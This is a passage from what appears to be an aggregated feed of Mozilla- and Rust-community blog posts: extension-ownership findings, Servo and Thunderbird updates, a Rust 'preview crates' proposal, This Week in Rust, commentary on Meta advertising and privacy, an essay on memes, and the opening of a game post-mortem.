  • Darktheme for google translate and Download Manager Integration Checklist extensions both appear to have changed hands in 2024, after which they requested more privileges with an update in October 2024.
  • Download Manager Integration Checklist extension used to be called “IDM Integration Module” in 2022. There have been at least five more extensions with similar names (not counting the official one), all removed from Chrome Web Store due to “policy violation.” This particular extension was associated with a website which is still offering “cracks” that show up as malware on antivirus scans (the installation instructions “solve” this by recommending to turn off antivirus protection). But that’s most likely the previous extension owner.
  • Convert PDF to JPEG/PNG appears to have gone through a hidden ownership change in 2024, after which an update in September 2024 requested vastly extended privileges. However, the extension has reviews complaining about spammy behavior going back to 2019.

Mozilla Performance Blog: Performance Testing Newsletter (Q4 Edition)

Welcome to the latest edition of the Performance Testing Newsletter! The PerfTools team empowers engineers with tools to continuously improve the performance of Mozilla products. See below for highlights from the changes made in the last quarter.

This quarter also saw the release of perf.compare! It’s a new tool for making comparisons between try runs (or other pushes). It is now the default tool for these comparisons, replacing the Compare View that was in use previously. Congratulations to all the folks involved in making this release happen! Feel free to reach out in #perfcompare on Matrix if there are any questions, feature requests, etc. Bugs can be filed in Testing :: PerfCompare.

Highlights from Contributors

PerfCompare

Profiler

Perftest

Highlights from Rest of the Team

Blog Posts ✍️

Contributors

If you have any questions, or are looking to add performance testing for your code component, you can find us in #perftest on Element, or #perf-help on Slack.

The Servo Blog: Servo in 2024: stats, features and donations

Two years after the renewed activity on the project we can confirm that Servo is fully back.

If we ignore the bots, in 2024 we’ve had 129 unique contributors (+143% over 54 last year), landing 1,771 pull requests (+163% over 673), and that’s just in our main repo!

Including bots, the total number of PRs merged goes up to 2,674 (+144% over 1,094). Of all this work, 26% of the PRs were made by Igalia, 40% by other contributors, and the remaining 34% by the bots. This shows how the Servo community has been growing and becoming more diverse, with new actors participating actively in the project.

                                        2018   2019   2020   2021  2022   2023   2024
Merged PRs                             1,188    986    669    118    65    776  1,771
Unique contributors                      142    141     87     37    20     54    129
Average unique contributors per month  27.33  27.17  14.75   4.92  2.83  11.33  26.33

Now let’s take a look at the data and chart above, which show the evolution since 2018 in number of merged PRs, unique contributors per year, and average contributors per month (excluding bots). We can see the project is back to the numbers of 2018 and 2019, when it was being developed at full speed!

It’s worth noting that Servo’s popularity keeps growing: many folks realized last year that there is renewed activity on the project, and more and more people are interested in it.

[Chart: Servo GitHub star history, climbing steadily since 2013. Servo GitHub stars haven’t stopped growing, now surpassing the 25K threshold.]

During 2024 Servo was present at 8 events with 9 talks: FOSDEM, Open Source Summit North America, Seattle Rust user meetup, GOSIM Europe, Global Software Technology Summit, Linux Foundation Europe Member Summit, GOSIM China, Ubuntu Summit.

If we focus on development, many things moved forward during the year. Servo’s main dependencies (SpiderMonkey, Stylo and WebRender) have been upgraded, and the new layout engine has kept evolving, adding support for floats, tables, flexbox, fonts, etc. By the end of 2024 Servo passes 1,515,229 WPT subtests (79%). Many other new features have been under active development: WebGPU, Shadow DOM, ReadableStream, WebXR, … Servo now supports two new platforms: Android and OpenHarmony. And we have seen the first experiments with applications using Servo as a web engine (like Tauri, Blitz, QtWebView, Cuervo, Verso and Moto).

In 2024 we have raised 33,632.64 USD with donations via Open Collective and GitHub Sponsors from 500 different people and organizations. Thank you all for supporting us!

With this money we now have 3 servers providing self-hosted runners for Linux, macOS, and Windows, reducing our build times from over an hour to under 30 minutes.

Talking about the future, the Servo TSC has been discussing the roadmap for 2025, which has been updated on the Servo wiki. We have many plans to keep Servo thriving with new features and improvements. Let’s hope for a great 2025!

Mozilla Thunderbird: VIDEO: The Thunderbird Mobile Team

The Thunderbird Mobile team are crafting the newest chapter of the Thunderbird story. In this month’s office hours, we sat down to chat with the entire mobile team! This includes Philipp Kewisch, Sr. Manager of Mobile Engineering (and long-time Thunderbird contributor), and Sr. Software Engineers cketti and Wolf Montwé (long-time K-9 Mail maintainer and developer, respectively). We talk about the journey from K-9 Mail to Thunderbird for Android, what’s new and what’s coming in the near future, and the first steps towards Thunderbird on your iOS devices!

Next month, we’ll be chatting with Laurel Terlesky, Manager of the UI/UX Design Studio! She’ll be sharing her FOSDEM talk, “Thunderbird: Building a Cross-Platform, Scalable Open-Source Design System.” It’s been a while since we’ve chatted with the design team, and it will be great to see what they’re working on.

January Office Hours: The Thunderbird Mobile Team

In June 2022, we announced that K-9 Mail would be joining the Thunderbird family, and would ultimately become Thunderbird for Android. After two years of development, the first beta release of Thunderbird for Android debuted in October 2024, shortly followed by the first stable release. Since then, over 200 thousand users have downloaded the app, and we’ve gotten some very nice reviews in ZDNet and Android Authority. If you haven’t tried us on your Android device yet, now is a great time! And if, like some of us, you’re waiting for Thunderbird to come to your iPhone or iPad, we have some exciting news at the end of our talk.

Want to know more about the Android development process and find out what’s coming soon to the app? Want the first look into our plans for Thunderbird on iOS? Let our mobile team guests provide the answers!

Watch, Read, and Get Involved

We’re so grateful to Philipp, cketti, and Wolf for joining us! We hope this video helps explain more about Thunderbird on Android (and eventually iOS), and encourages you to download the app if you haven’t already. If you’re a regular user, we hope you consider contributing code, translations, or support. And if you’re an iOS developer, we hope you consider joining our team!

VIDEO (Also on Peertube):

Thunderbird for Android Resources:

The post VIDEO: The Thunderbird Mobile Team appeared first on The Thunderbird Blog.

The Rust Programming Language Blog: Announcing Rust 1.84.1

Niko Matsakis: Preview crates

This post lays out the idea of preview crates.1 Preview crates would be special crates released by the rust-lang org. Like the standard library, preview crates would have access to compiler internals but would still be usable from stable Rust. They would be used in cases where we know we want to give users the ability to do X but we don’t yet know precisely how we want to expose it in the language or stdlib. In git terms, preview crates would let us stabilize the plumbing while retaining the ability to iterate on the final shape of the porcelain.

Nightly is not enough

Developing large language features is a tricky business. Because everything builds on the language, stability is very important, but at the same time, there are some questions that are very hard to answer without experience. Our main tool for getting this experience has been the nightly toolchain, which lets us develop, iterate, and test features before committing to them.

Because the nightly toolchain comes with no guarantees at all, however, most users who experiment with it do so lightly, just using it for toy projects and the like. For some features, this is perfectly fine, particularly syntactic features like let-else, where you can learn everything you need to know about how it feels from a single crate.

Nightly doesn’t let you build a fledgling ecosystem

Where nightly really fails us though is the ability to estimate the impact of a feature on a larger ecosystem. Sometimes you would like to expose a capability and see what people build with it. How do they use it? What patterns emerge? Often, we can predict those patterns in advance, but sometimes there are surprises, and we find that what we thought would be the default mode of operation is actually kind of a niche case.

For these cases, it would be cool if there were a way to issue a feature in “preview” mode, where people can build on it, but it is not yet released in its final form. The challenge is that if we want people to use this to build up an ecosystem, we don’t want to disturb all those crates when we iterate on the feature. We want a way to make changes that lets those crates keep working until the maintainers have time to port to the latest syntax, naming, or whatever.

Editions are closer, but not quite right

The other tool we have for correcting mistakes is editions. Editions let us change what syntax means and, because they are opt-in, all existing code continues to work.

Editions let us fix a great many things to make Rust more self-consistent, but they carry a heavy cost. They force people to relearn how things in Rust work. They make books outdated. This price is typically too high for us to ship a feature knowing that we are going to change it in a future edition.

Let’s give an example

To make this concrete, let’s take a specific example. The const generics team has been hard at work iterating on the meaning of const trait and in fact there is a pending RFC that describes their work. There’s just one problem: it’s not yet clear how it should be exposed to users. I won’t go into the rationale for each choice, but suffice to say that there are a number of options under current consideration. All of these examples have been proposed, for example, as the way to say “a function that can be executed at compilation time which will call T::default”:

  • const fn compute_value<T: ~const Default>()
  • const fn compute_value<T: const Default>()
  • const fn compute_value<T: Default>()

At the moment, I personally have a preference between these (I’ll let you guess), but I figure I have about… hmm… 80-90% confidence in that choice. And what’s worse, to really decide between them, I think we have to see how the work on async proceeds, and perhaps also what kinds of patterns turn out to be common in practice for const fn. This stuff is difficult to gauge accurately in advance.

Enter preview crates

So what if we released a crate rust_lang::const_preview? In my dream world, this is released on crates.io, using the namespaces described in RFC #3243 (https://rust-lang.github.io/rfcs/3243-packages-as-optional-namespaces.html). Like any crate, const_preview can be versioned. It would expose exactly one item, a macro const_item that can be used to write const functions that have const trait bounds:

const_preview::const_item! {
    const fn compute_value<T: ~const Default>() {
        // as `~const` is what is implemented today, I'll use it in this example
    }
}

Internally, this const_item! macro can make use of internal APIs in the compiler to parse the contents and deploy the special semantics.

Releasing v2.0

Now, maybe we use this for a while, and we find that people really don’t like the ~, so we decide to change the syntax. Perhaps we opt to write const Default instead of ~const Default. No problem, we release a 2.0 version of the crate and we also rewrite 1.0 to take in the tokens and invoke 2.0 using the semver trick.

const_preview::const_item! {
    const fn compute_value<T: const Default>() {
        // in 2.0, plain `const` replaces the `~const` syntax from 1.0
    }
}

Integrating into the language

Once we decide we are happy with const_item! we can merge it into the language proper. The preview crates are deprecated and simply desugar to the true language syntax. We all go home, drink non-fat flat whites, and pat ourselves on the back.

User-based experimentation

One thing I like about the preview crates is that then others can begin to do their own experiments. Perhaps somebody wants to try out what it would be like if T: Default meant const by default – they can readily write a wrapper that desugars to const_preview::const_item and try it out. And people can build on it. And all that code keeps working once we integrate const functions into the language “for real”; it just looks kinda dated.

Frequently asked questions

Why else might we use previews?

Even if we know the semantics, we could use previews to stabilize features where the user experience is not great. I’m thinking of Generic Associated Types as one example, where the stabilization was slowed because of usability concerns.

What are the risks from this?

The previous answer hints at one of my fears… if preview crates become a widespread way for us to stabilize features with usability gaps, we may accumulate a very large number of them and then never move those features into Rust proper. That seems bad.

Shouldn’t we just make a decision already?

I mean… maybe? I do think we are sometimes very cautious. I would like us to get better at leaning on our judgment. But I also sense that sometimes there is a tension between “getting something out the door” and “taking the time to evaluate a generalization”, and it’s not clear to me whether this tension is inherent or an artifact of the way we do business.

But would this actually work? What’s in that crate and what if it is not matched with the right version of the compiler?

One very special thing about libstd is that it is released together with the compiler and hence it is able to co-evolve, making use of internal APIs that are unstable and change from release to release. If we want to put this crate on crates.io, it will not be able to co-evolve in the same way. Bah. That’s annoying! But I figure we could still handle it by having the preview functionality exposed by crates in the sysroot that ship along with the compiler. These sysroot crates would not be directly usable except by our blessed crates.io crates; they would basically just be shims that expose the underlying stuff. We could of course cut out the middleman and just have people use those sysroot crates directly – but I don’t like that as much because it’s less obvious and because we can’t as easily track reverse dependencies on crates.io to evaluate usage.

A macro seems heavyweight! What other options have you considered?

I also considered the idea of having p# keywords (“preview”), so e.g.

#[allow(preview_feature)]
p#const fn compute_value<T: p#const Default>() {
    // works on stable
}

Using a p# keyword would fire off a lint (preview_feature) that you would probably want to allow.

This is less intrusive, but I like the crate idea better because it allows us to release a v2.0 of the p#const keyword.

What kinds of things can we use preview crates for?

Good question. I’m not entirely sure. It seems like APIs that require us to define new traits and other things would be a bit tricky to maintain the total interoperability I think we want. Tools like trait aliases etc (which we need for other reasons) would help.

Who else does this sort of thing?

Ember has formalized this “plumbing first” approach in their version of editions. In Ember, from what I understand, an edition is not a “time-based thing”, like in Rust. Instead, it indicates a big shift in paradigms, and it comes out when that new paradigm is ready. But part of the process to reaching an edition is to start by shipping core APIs (plumbing APIs) that create the new capabilities. The community can then create wrappers and experiment with the “porcelain” before the Ember crate enshrines a best practice set of APIs and declares the new Edition ready.

Java has a notion of preview features, but they are not semver guaranteed to stick around.

I’m not sure who else!

Could we use decorators instead?

Usability of decorators like #p[const_preview::const_item] is better, particularly in rust-analyzer. The tricky bit there is that decorators can only be applied to valid Rust syntax, so it implies we’d need to extend the parser to include things like ~const forever, whereas I might prefer to have that complexity isolated to the const_preview crate.

So is this a done deal? Is this happening?

I don’t know! People often think that because I write a blog post about something it will happen, but this is currently just in the “early ideation” stage. As I’ve written before, though, I continue to feel that we need some kind of “middle state” for our release process (see e.g. this blog post, Stability without stressing the !@#! out), and I think preview crates could be a good tool to have in our toolbox.


  1. Hat tip to Yehuda Katz and the Ember community, Tyler Mandry, Jack Huey, Josh Triplett, Oli Scherer, and probably a few others I’ve forgotten with whom I discussed this idea. Of course, anything you like they came up with; everything you hate was my addition. ↩︎

Mozilla Localization (L10N): 2025 Pontoon survey results

The results from the 2025 Pontoon survey are in and the 3 top-voted features we commit to implement are:

  1. Add ability to preview Fluent strings in the editor (258 votes).
  2. Keep unsaved translations when navigating to other strings (252 votes).
  3. Hint at any available variants when referencing a message (229 votes).

The remaining features ranked as follows:

  1. Add virtual keyboard with special characters to the editor (226 votes).
  2. Link project names in Concordance search results to corresponding strings (223 votes).
  3. Add a batch action to pretranslate a selection of strings (218 votes).
  4. Add ability to edit and remove comments (216 votes).
  5. Enable use of generic machine translation engines with pretranslation (209 votes).
  6. Add ability to report comments and suggestions for abusive content (193 votes).
  7. Add “Copy translation from another locale as suggestion” batch action (186 votes).

We thank everyone who dedicated their time to share valuable responses and suggest potential features for us to consider implementing!

Each user could give each feature 1 to 5 votes. A total of 154 Pontoon users participated in the survey, 68 of whom voted on all features. The number of participants is lower than in past years, since we only reached out to users who explicitly opted in to email updates.

We look forward to implementing these new features and working towards a more seamless and efficient translation experience with Pontoon. Stay tuned for updates!

This Week In Rust: This Week in Rust 584

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Foundation
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs

Crate of the Week

This week's crate is embed_it, a crate that helps you to embed assets into your binary and generates structs / trait implementations for each file or directory.

Thanks to Riberk for the self-suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
  • No calls for testing were issued this week.
Rust
  • No calls for testing were issued this week.
Rustup
  • No calls for testing were issued this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.


Call for Participation

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

408 pull requests were merged in the last week

Rust Compiler Performance Triage

Relatively quiet week, with one large-ish regression that will be reverted. #132666 produced a nice perf. win, by skipping unnecessary work. This PR actually reversed a regression caused by a previous PR.

Triage done by @kobzol.

Revision range: 9a1d156f..f7538506

Summary:

(instructions:u)             mean    range            count
Regressions ❌ (primary)      0.5%    [0.2%, 2.2%]     42
Regressions ❌ (secondary)    2.1%    [0.1%, 11.6%]    56
Improvements ✅ (primary)     -0.8%   [-4.2%, -0.1%]   107
Improvements ✅ (secondary)   -1.2%   [-4.0%, -0.1%]   77
All ❌✅ (primary)             -0.5%   [-4.2%, 2.2%]    149

2 Regressions, 3 Improvements, 2 Mixed; 4 of them in rollups. 45 artifact comparisons made in total.

Full report here.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

  • No RFCs were approved this week.
Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
  • No RFCs entered Final Comment Period this week.
Tracking Issues & PRs
Rust Cargo
  • No Cargo Tracking Issues or PRs entered Final Comment Period this week.
Language Team
  • No Language Team Proposals entered Final Comment Period this week.
Language Reference
  • No Language Reference RFCs entered Final Comment Period this week.
Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs
  • No New or Updated RFCs were created this week.

Upcoming Events

Rusty Events between 2025-01-29 - 2025-02-26 🦀

Virtual
Asia
Europe
North America
Oceania

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

I have experience in multiple styles of MMA gained from fighting the borrow checker, if that counts.

Richard Neumann on rust-users

Thanks to Jonas Fassbender for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, U007D, joelmarcey, mariannegoldin, bennyvasquez, bdillo

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

Don Marti: time to sharpen your pencils, people

Mariana Olaizola Rosenblat covers How Meta Turned Its Back on Human Rights for Tech Policy Press. Zuckerberg announced that his company will no longer work to detect abuses of its platforms other than high-severity violations of content policy, such as those involving illicit drugs, terrorism, and child sexual exploitation. The clear implication is that the company will no longer strive to police its platform against other harmful content, including hate speech and targeted harassment.

Sounds like a brand-unsafe environment. So is another rush of advertiser boycott stories coming? Not this time. Lara O’Reilly reports that brand safety has recently become a political hot potato and been a flash point for some influential, right-leaning figures. In uncertain times, marketing decision-makers are keeping a low profile. Most companies aren’t really set up to take on the open-ended security risk of coming out against hate speech by users with friends in high places. According to the Fraternal Order of Police, the January 6 pardons send a dangerous message, and that message is being heard in marketing departments. The CMOs who boycotted last time are fully aware that stochastic terrorism is a thing, and that rage stories about companies spread quickly in Facebook groups and other extremist media. If an executive makes the news for pulling ads from Meta, they would be putting employees at risk from lone, deniable attacks. So instead of announcing a high-profile boycott, marketers are more likely to follow the example of Federal employees and do the right thing, by the book, and quietly.

Fortunately, big advertisers got some lower-stakes practice with the X (former Twitter) situation. Instead of either (1) staying on there and putting the brand at risk of being associated with material copied out of Henry Ford’s old newspaper or (2) risking getting snarled up in a lawsuit for pulling the X ads entirely, brands got the best of both by cutting way back on the actual money without dropping X entirely or saying much one way or the other.

And it’s possible for advertisers to reduce support for Meta without making a stink or drawing fire. Fortunately, Meta ads are hella expensive, and results can be unrealistic and unsustainable. Like all the Big Tech companies these days, Meta is coping with a slowdown in innovation by tweaking the ad rules to capture more revenue from existing services. As Jakob Nielsen pointed out back in 2006, in Search Engines as Leeches on the Web, ad platforms can even capture the value created by others. A marketer doesn’t have to shout ¡No Pasarán! or anything—just sharpen your best math pencil, quietly go through the numbers, spot something that looks low-ROAS or fraudulent in the Meta column, tweak the budget, repeat. If users can dial down Meta, so can marketers. (Update: Richard Kirk writes, Brands could be spending three times too much on social. You read that right. Read the math, do the math.) And if Meta comes out with something new and risky like the adfraud in the browser thing, Privacy-Preserving Attribution, it’s easy to use the fraud problem as the reason not to do it—you don’t have to stand up and talk politics at work.

From the user side

It’s not that hard to take privacy measures that result in less money for Big Tech. Even if you can’t quit Meta entirely, some basic tools and settings can make an impact, especially if you use both a laptop and a phone, not just a phone. With a few minutes of work, an individual in the USA can, in effect, fine the surveillance business about $50/month.

My list of effective privacy tips is prioritized by how much I think they’ll cost the surveillance business per minute spent. A privacy tips list for people who don’t like doing privacy tips but also don’t like creepy oligarchs. (As they say in the clickbait business, number 9 will shock you: if you get your web browser info from TV and social media, you probably won’t guess which browsers have built-in surveillance and/or fraud features.) That page also has links to more intensive privacy advice for those who want to get into it.

A lawyer question

As an Internet user, I realize I can’t get to Meta surveillance neutral just with my own privacy tools and settings. For the foreseeable future, companies are going to be doing server-to-server tracking of me with Meta CAPI.

So in order to get to a rough equivalent of not being surveilled, I need to balance out their actual surveillance by introducing some free speech into the system. (And yes, numbers can be speech. O, the Tables tell!) So what I’d like to do is write a surrogate script (that can be swapped in by a browser extension in place of the real Meta Pixel, like the surrogate scripts uBlock Origin uses) to enable the user to send something other than valid surveillance data. The user would configure what message the script would send. The surrogate script would then encode the message and pass it to Meta in place of the surveillance data sent by the original Meta script. There is a possible research angle to this, since I think that in general, reducing ad personalization tends to help people buy better products and services. An experiment would probably show that people who mess with cross-context surveillance are happier with their purchases than those who allow surveillance. Releasing a script like that is the kind of thing I could catch hell for, legally, so I’m going to wait to write it until I can find a place to host it and a lawyer to represent me. Anyone?

Related

Big Tech platforms: mall, newspaper, or something else?

Sunday Internet optimism

Bonus links

After Big Social. Dan Phiffer covers the question of where to next. I am going into this clear-eyed; I’m going to end up losing touch with a lot of people. For many of my contacts, Meta controls the only connection we have. It’s a real loss, withdrawing from communities that I’ve built up over the years (or decades in the case of Facebook). But I’m also finding new communities with different people on the networks I’m spending more time in.

No Cookies For You!: Evaluating The Promises Of Big Tech’s ‘Privacy-Enhancing’ Techniques Kirsten Martin, Helen Nissenbaum, and Vitaly Shmatikov cover the problems with privacy-enhancing Big Tech features. (Not everything with privacy in its name is a privacy feature. It’s like open I guess.)

The Mozilla Blog: IYKYK: The secret language of memes

[Image: a meme-style photo featuring a man looking back in surprise while his female companion gestures in disbelief, overlaid with colorful speech bubbles saying “IKR?” and emoji-style icons.]

A smiling woman with long dark hair, wearing colorful earrings and a navy blue polka dot top, in front of a turquoise background.
Dr. Erica Brozovsky is a sociolinguist, a public scholar and a lover of words. She is the host of Otherwords, a PBS series on language and linguistics, and a professor of writing and rhetoric at Worcester Polytechnic Institute. You can find her at @ericabrozovsky on most platforms. Photo: Kelly Zhu

If you’ve been on the internet anytime in the past 25 years, there’s a good chance you’ve seen a meme, shared a meme, or perhaps even created a meme. From the LOLcats and Advice Animals of the mid-2000s to the many emotions of Moo Deng, the world’s favorite pygmy hippopotamus, internet memes allow us to share pieces of media that we find funny, ironic or relatable.

Author Mike Godwin coined the term “internet meme” in the June 1993 edition of Wired magazine. However, that wasn’t the advent of the word meme. In his 1976 book, “The Selfish Gene,” evolutionary biologist Richard Dawkins conceived the term to represent “ideas, behaviors, or styles that spread from person to person.” If you think that sounds a bit contagious, you’re absolutely correct. Much as contagion spreads, so does the imitation of ideas in the form of memes, circulating humor across society.

But who claims the crown of first-ever internet meme? Is it the 1998 Hamster Dance gif created by Deidre LaCarte as a GeoCities page?

Or is it the 1996 Autodesk Dancing Baby that has now become an NFT? (Creator Michael Girard claims so.)

Those definitely went viral, but are they memes? Perhaps not. A funny image (or gif or video) is just a funny image… or gif, or video… unless it achieves the two keys to memehood: inspiring creative variations (that are then copied and spread) and being imbued with cultural context, like that Pepperidge Farm meme (iykyk).

from Imgflip Meme Generator

The Cow Guide, for example, might be considered a precursor to the internet meme.

Full of ASCII character drawings of variations on cows, The Cow Guide spread on Usenet in the ‘80s and ‘90s (pre-World Wide Web), with people adding new cows with every repost. While memes do exist offline, internet memes really took off in the 2000s within anonymous web communities like 4chan (which required images with each post), Reddit, and Tumblr, which debuted in 2003, 2005, and 2007, respectively. In the late aughts, internet curators like BuzzFeed and social media sites made memes more mainstream. And now they’re everywhere.

Meme culture is so quick, with turnaround and multiple iterations within minutes of an event happening. Even if the source material is a real and consequential topic, a funny meme brings attention, as humor and levity travel further and faster than seriousness and sincerity.

Global and national events (like the Olympics and the U.S. presidential election) are goldmines for meme-able opportunities that allow information to spread faster than the traditional news cycle. Take, for instance, Stephen Nedoroscik, Team USA’s pommel horse powerhouse, who became the subject of countless memes for his incredible performance and comparisons to Clark Kent.

But how is it that memes are significant enough to have given rise to an entire academic field — memetics — and a category in the Library of Congress? The U.K.’s National Science and Media Museum is even putting this absolute unit on display as their first “digitally-born object.”

Are memes useful for more than just laughs or, more realistically, those small exhales through the nose of mild amusement?

Definitively, yes. Here’s a comparison: A minute is a unit of time, a meter is a unit of measure, and a meme is a unit of culture. Today internet memes (which we’ll just call memes) can be described as “units of popular culture that are circulated, imitated, and transformed by internet users, creating a shared cultural experience.” The key part of that definition is the creation of a shared cultural experience. That seems pretty deep for something as trivial as a reaction GIF or silly picture with text slapped on it, but it’s true.

Think of it this way: Have you ever made a reference, maybe to a movie, a song lyric, a book or a funny TikTok you saw, only to be met with silence or questioning looks from the group you’re talking to? When even just one other person gets the reference, you feel a sense of kinship; you know the two of you have something in common. This is what happens with memes. The internet is so vast now that we’re not all part of the same communities online, so when you “get” a meme, there’s a shared sense of humor and a feeling of belonging. And laughing together strengthens relationships and fosters community, making you feel closer.

Nowadays, memes have grown into the mainstream, many making it outside of their original subculture to become widely culturally relevant. And the faces behind some popular memes have gained celebrity status even offline. Case in point: In early November 2024, the people behind three iconic memes of the 2010s met up, causing an internet uproar.

There’s a meme out there for every facet of your identity and every interest you hold, from a corporate job to a keen interest in birdwatching to crossovers between Pokémon and Thomas the Tank Engine. When multiple specific interests collide in a meme… well there’s a reason the phrase “I’ve never had an original thought or experience” became so popular online.

That’s not even scratching the surface of the weird, wild and wonderful world of niche memes. And that is exactly where the hyper-specific meme shines in its ability to broker connections. If you can parse through the layers of meaning and referential humor, then you’re part of the exclusive club of people in the know.

Today, we can be defined by the media we consume, so understanding a meme, especially if it’s highly intertextual and referential, gives insight into who a person is and what corners of the internet they inhabit. Memes serve as inside jokes for subcommunities online, and the more iterations and riffs on the joke, the higher the barrier to entry for outsiders, further cementing the group’s identity. If you understand a niche meme, you come to realize you’re part of a very specific collective of internet users, for better or for worse.

Memes are digital manifestations of shared online experiences and interactions. They have set structures and social dynamics, and by intertextually referencing various pop culture tokens, they show affiliation and affinity to specific internet subgroups. They subtly ask if you understand, and if you do (and iykyk), you’re initiated into the club as “one of us, one of us!” Memes are not random. They’re created to appeal to a specific chosen audience who will then hopefully pass on the meme like a contagion of amusement because they identify with it.

We share memes because we assume our audience, upon wading through the subtext, will find them worthwhile, whether because of humor or in-group membership. Whether posting into the void that is Tumblr or 4chan or Reddit, or sending memes directly to your friends or family in a form of digital pebbling — like penguins presenting smooth stones to their prospective mates in courtship rituals — spreading these internet cultural tokens is a bid for social connection. And through that connection, we show affiliation with others who understand the digital inside joke that is a shared piece of popular culture. Memes are cultural artifacts and efficient forms of communication to those who understand the context. And oftentimes they’re funny, which is just an added bonus. Put simply, humans crave connection, and memes just do it for us. 


The post IYKYK: The secret language of memes appeared first on The Mozilla Blog.

Adrian Gaudebert3 years of intense learning - The Dawnmaker Post-mortem

It's been 3 years since I started working on Dawnmaker full-time with Alexis. The creation of our first commercial game coincided with the creation of Arpentor Studio, our company. I've shared a lot of insights along the way on this blog, from how we did our first market research (which was incredibly wrong) to how much we made with our game (look at the difference between the two, it's… interesting). I wrote a pretty big piece where I explained how we built Arpentor Studio. I wrote a dozen smaller posts about the development of Dawnmaker. And I shared a bunch of my feelings, mistakes and successes in my yearly State of the Adrian posts (in French only, sorry).

But today, I want to take a step back and give a good look at these last 3 years. It's time for the Dawnmaker post-mortem, where I'm going to share what I believe we did well, what we did wrong, and what I've learned along the way. Because Dawnmaker and Arpentor Studio are so intertwined, I'm inevitably going to talk about the studio as well, but I think it makes sense. Let's get started!

What we did

Let's get some context first. Dawnmaker is a solo strategy game, mixing city building and deckbuilding to create a board game-like experience. It was released in July 2024 on Steam and itch.io. The team consisted of 2 full-time people, with occasional help from freelancers. My associate Alexis took care of everything related to graphics, and I did the programming and game design of the game. If you're interested in how much the game sold, I wrote a blog post about this: 18 days of selling Dawnmaker.

Dawnmaker capsule

I created the very first prototype of what would become Dawnmaker back in the summer of 2021, but we only started working on the game full-time in December of that year. We joined a local incubator in 2022, which kind of shook our plans: we spent a significant portion of our time working on administrative things around the game, like making pitch decks and funding briefs. We had to create a company earlier than we had planned in order to ask for public funding. So in 2022 we only spent about half our time actually developing the game. In 2023, after our main funding application was rejected, we shrunk our ambitions and focused on just making the game. We still spent time improving our pitch deck and contacted some publishers, but never managed to secure a deal. In early 2024, we decided to self-publish, started our Steam page and worked on promoting the game while polishing what we had.

Because we never found a publisher, we never had the money to do the production phase of Dawnmaker. That means the game shipped with about half the content we wanted it to have. Here are my definitions of the different phases of a game project, as I'll refer to them later on in this article:

  1. Ideation — The phase where we are defining the key concepts of the game we want to make. There's some early prototyping there, as well as research. The goal is to have a clear picture of what we want to build.
  2. Pre-production — The phase where we validate what the core of the game is, that it is fun, and that we will be able to actually deliver it. It can be cut down into three steps: prototyping, pre-production and vertical slice. In prototyping we validate the vision of the game. In pre-production (yes, it's the same name as the phase, but that's what I was taught) we build our production pipeline. During the vertical slice, we validate that the pipeline works and finalize the main systems of the game.
  3. Production — The phase where we build the content of the game. This phase is supposed to be one that can be planned very precisely, because the pre-production has supposedly removed almost all the unknowns.
  4. Post-production — The phase where we polish our game and take it through the finish line.

Now that you have some context, let's get into the meat of this article!

What we did right

Let's start this post-mortem on a positive note, and list the things that I believe we did well. First and foremost, we actually shipped a game! Each game that comes out is a little miracle, and we succeeded there. We kept our vision, we pushed it as far as we could, and we did not give up. Bravo us!

Good game quality

What's more, our game has been very well received: at the time of writing, we have a 93% positive review ratio on Steam, from 103 reviews. I am of course stoked that Dawnmaker was liked by that many reviewers. I think there are 3 main reasons why we had such positive reviews (other than the game being decently fun, of course):

  1. We kept a demo up at all times, even after the release, meaning that tentative customers could give it a try before buying. If they didn't like the demo, they didn't buy the game — not good for us — but then they were not disappointed by a product they bought — good for them and for our reviews!
  2. We were speaking to a very small niche, but provided something that was good for them. The niche is a weird intersection of deckbuilding, city building and board game fans. It was incredibly difficult to find and talk to, probably because it is, as I said, very small, but we made something that worked very well for those players.
  3. We under-priced the game aggressively (at $9.99) to lower the players' expectations. That actually came through in the reviews, where a few people mentioned that the game had flaws, but they tolerated them because of the price tag. (Note: the game has since been moved up to a $14.99 price point by our new publisher.)

Of course, had the game been bad, we would not have had those reviews at all. So it goes to say that Dawnmaker is a fine game. For all its flaws, it is fun to play. I've played it a lot — as I guess do all game creators with their creation — and it took me a while to get bored with it. The median playtime on Steam is 3 hours and 23 minutes, with an average playtime of 8 hours and 17 minutes. Here's a stat that blows my mind: at the time of writing, 175 people (about 10% of our players) have played Dawnmaker for more than 20 hours. At least 15 people played it for more than 50 hours. I know this is far from the life-devouring monsters that are out there, like Civilization, Skyrim, Minecraft or GTA, but for our humble game and for me, that's incredible to think about.

